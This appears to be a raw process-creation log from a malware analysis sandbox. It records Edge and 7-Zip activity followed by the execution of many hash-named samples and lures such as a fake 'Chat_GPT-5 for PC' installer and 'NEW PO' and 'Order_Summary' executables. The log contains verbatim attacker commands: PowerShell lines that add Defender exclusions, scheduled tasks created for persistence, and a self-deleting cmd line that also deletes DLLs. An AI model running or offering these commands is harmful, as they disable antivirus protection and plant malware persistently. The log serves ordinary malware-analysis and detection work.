"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5080 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6976 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-13\" -spe -an -ai#7zMap18022:88:7zEvent14173
C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe
"C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe"
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-13\881aa4a7e41df5264bbfc6e4dab64666051de4b22dd7a5c2bcfac93f9f8fbf3c\" -spe -an -ai#7zMap21419:218:7zEvent16652
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\2023-11-23-13\881aa4a7e41df5264bbfc6e4dab64666051de4b22dd7a5c2bcfac93f9f8fbf3c\Chat_GPT-5 for PC Installation v1.1.3\GPT5 for PC Installation v1.1.3.msi"
C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe
"C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe"
C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe
"C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe"
C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe
"C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DOS Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE560.tmp"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DOS Manager Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE62C.tmp"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-12\" -spe -an -ai#7zMap21533:88:7zEvent29835
C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe
"C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe"
C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe
"C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe"
C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe
"C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe"
C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe
"C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe"
C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe
"C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe"
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\" -spe -an -ai#7zMap27574:218:7zEvent32257
C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe
"C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe"
C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe
"C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe"
C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe
"C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\PkQqCfDORU.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PkQqCfDORU" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA125.tmp"
C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe
"C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4392 -ip 4392
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 2232
C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe
"C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe"
C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe
"C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\87zsgA5Of2.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe
"C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe"
C:\Program Files (x86)\Windows Multimedia Platform\smss.exe
"C:\Program Files (x86)\Windows Multimedia Platform\smss.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\PkQqCfDORU.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PkQqCfDORU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp461F.tmp"
C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe
"C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe"
C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe
"C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-07\" -spe -an -ai#7zMap15053:88:7zEvent11657
C:\Users\Admin\Downloads\2023-11-23-07\7fcf515fc374fde7a68255e8bee877a91963cbd54e86eaa222a0efb550cebb6b.exe
"C:\Users\Admin\Downloads\2023-11-23-07\7fcf515fc374fde7a68255e8bee877a91963cbd54e86eaa222a0efb550cebb6b.exe"
C:\Users\Admin\AppData\Local\Temp\ghstve.exe
"C:\Users\Admin\AppData\Local\Temp\ghstve.exe"
C:\Users\Admin\AppData\Local\Temp\ghstve.exe
"C:\Users\Admin\AppData\Local\Temp\ghstve.exe"
C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe
"C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe"
C:\Users\Admin\Downloads\2023-11-23-07\87dc39ac4be051faa3b71b9898b3cd39eaf8c78f5d59610ade25f63c306887ad.exe
"C:\Users\Admin\Downloads\2023-11-23-07\87dc39ac4be051faa3b71b9898b3cd39eaf8c78f5d59610ade25f63c306887ad.exe"
C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe
"C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe"
C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe
"C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe"
C:\Users\Admin\Downloads\2023-11-23-07\9967dbf940ce71c3aff8f0b62c7ef9324dd30e6ae4bbb2db4b16c0a184e383f7.exe
"C:\Users\Admin\Downloads\2023-11-23-07\9967dbf940ce71c3aff8f0b62c7ef9324dd30e6ae4bbb2db4b16c0a184e383f7.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe
"C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe"
C:\Users\Admin\Downloads\2023-11-23-07\a7a33a377911477afe031d59a486e5ed432da1bd9fabfb9450a5951c7b2edd07.exe
"C:\Users\Admin\Downloads\2023-11-23-07\a7a33a377911477afe031d59a486e5ed432da1bd9fabfb9450a5951c7b2edd07.exe"
C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe
"C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe"
C:\Users\Admin\Downloads\2023-11-23-07\8ba6d00a29c4a11c7fcbf696066abb1e891aef6ab8bbc1f7ddd128da24a9a8f6.exe
"C:\Users\Admin\Downloads\2023-11-23-07\8ba6d00a29c4a11c7fcbf696066abb1e891aef6ab8bbc1f7ddd128da24a9a8f6.exe"
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-07\8d9050074a495def6132461608249dad47f5b014c35abc0c6773742d0211b251\" -spe -an -ai#7zMap30902:218:7zEvent11110
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-07\70bcc3b1407f7dd2c403231a4f2c1e374b715248be005684b6d1e36c0b3a6ffe\" -spe -an -ai#7zMap6707:218:7zEvent18498
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\" -spe -an -ai#7zMap24720:218:7zEvent29395
C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe
"C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe"
C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\Order_Summary.exe
"C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\Order_Summary.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\2023-11-23-07\714971d8fde4253f72440e5880af794ae86ca0b2557df3b9de2aca24990c1c9c.xlsx"
C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe
"C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe"
C:\Users\Admin\Downloads\2023-11-23-07\0860dafaa3db5f440b61cea445c066dcbad2285512eb2962236ad1a8366bf527.exe
"C:\Users\Admin\Downloads\2023-11-23-07\0860dafaa3db5f440b61cea445c066dcbad2285512eb2962236ad1a8366bf527.exe"
C:\Users\Admin\AppData\Roaming\smssc\smssc.exe
"C:\Users\Admin\AppData\Roaming\smssc\smssc.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2240 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
